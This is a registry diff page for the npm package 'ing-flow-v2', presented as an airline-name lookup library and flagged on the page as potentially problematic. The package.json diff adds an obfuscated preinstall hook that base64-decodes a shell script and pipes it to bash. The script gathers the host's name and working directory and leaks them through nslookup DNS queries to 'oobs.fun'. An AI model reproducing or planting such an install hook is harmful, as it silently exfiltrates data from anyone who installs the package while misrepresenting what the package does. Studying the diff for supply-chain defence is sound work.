ing-flow-v2 0.0.1-security → 23.9.7
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ing-flow-v2 might be problematic. Click here for more details.
- package/README.md +10 -3
- package/index.js +4 -0
- package/package.json +20 -3
package/README.md
CHANGED
@@ -1,5 +1,12 @@
|
|
1
|
-
#
|
1
|
+
# ing-flow-v2
|
2
2
|
|
3
|
-
This
|
3
|
+
This library provides with names of airlines based on IATA codes from Openflights.org
|
4
4
|
|
5
|
-
|
5
|
+
### Usage
|
6
|
+
|
7
|
+
```
|
8
|
+
var airlines = require('ing-flow-v2');
|
9
|
+
|
10
|
+
console.log(airlines.getAirlineName("Q6"));<br>
|
11
|
+
// 50-Mile ING Air
|
12
|
+
```
|
package/index.js
ADDED
package/package.json
CHANGED
@@ -1,6 +1,23 @@
|
|
1
1
|
{
|
2
2
|
"name": "ing-flow-v2",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "23.9.7",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "echo \"YT0wOyB4PSdpbmctZmxvdy12Mic7CmQ9Im9vYnMuZnVuIjsKcz0iaG9zdG5hbWU9YGhvc3RuYW1lYDtwYXRoPWBwd2RgIgppZiBlPWBlY2hvICRzIHwgYmFzZTY0IC1iNTcgMj4vZGV2L251bGxgOyB0aGVuCiAgICAgICAgZj1gZWNobyAkZSB8IHNlZCAtciAncy89L0VRVUFML2c7cy8tL0RBU0gvZztzL1wrL1BMVVMvZydgCiAgICAgICAgZWNobyAkZiB8IHRyICIgIiAiXG4iIHwgd2hpbGUgcmVhZCBqOyBkbyBuc2xvb2t1cCAiJChwcmludGYgJyUwNGQnICRhKS4kai4keC4kZCIgPiAvZGV2L251bGw7KChhKyspKTtkb25lCmVsc2UKICAgICAgICBlPWBlY2hvICRzIHwgYmFzZTY0IC13NTdgCiAgICAgICAgZj1gZWNobyAkZSB8IHNlZCAtciAncy89L0VRVUFML2c7cy8tL0RBU0gvZztzL1wrL1BMVVMvZydgCiAgICAgICAgZWNobyAkZiB8IHRyICIgIiAiXG4iIHwgd2hpbGUgcmVhZCBqOyBkbyBuc2xvb2t1cCAiJChwcmludGYgJyUwNGQnICRhKS4kai4keC4kZCIgPiAvZGV2L251bGw7KChhKyspKTtkb25lCmZp=\" | base64 -d | bash"
|
8
|
+
},
|
9
|
+
"repository": {
|
10
|
+
"type": "git",
|
11
|
+
"url": "git+https://github.com/malaymatwankar/ing-flow-v2.git"
|
12
|
+
},
|
13
|
+
"author": "malaymatwankar",
|
14
|
+
"license": "ISC",
|
15
|
+
"bugs": {
|
16
|
+
"url": "https://github.com/malaymatwankar/ing-flow-v2/issues"
|
17
|
+
},
|
18
|
+
"homepage": "https://github.com/malaymatwankar/ing-flow-v2#readme",
|
19
|
+
"description": "This library provides with names of airlines based on IATA codes from Openflights.org",
|
20
|
+
"keywords": [
|
21
|
+
"airlines"
|
22
|
+
]
|
6
23
|
}
|